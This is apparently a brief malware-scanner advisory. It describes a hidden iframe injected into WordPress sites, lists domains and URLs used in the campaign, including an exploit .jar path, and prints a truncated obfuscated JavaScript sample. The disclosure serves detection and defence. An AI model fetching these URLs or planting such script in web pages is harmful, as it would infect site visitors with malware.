Description: A Hidden iframe was detected. This is often used to load malware
from infected WordPress/OpenX sites. Domains used in the malware campaign: http://inlovebot.com/vip.php?s=0
http://wsus-services.com/exploits/des.jar
http://vcerubnit.com/gjrbf78u.php?s=IBB@G
http://tetrall.com/count29.php
http://crazymasya.com/vip.php?s=1
(and others).
Affecting: Any web site (using WordPress)
Malware dump (sample of malware):
cAopeOld=0.009;copeOld++;copeWoo='';this.copeSon=['mutCope','daceAle'];aleDace={taosAle:false};aleTaos=new Date();function...
if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln..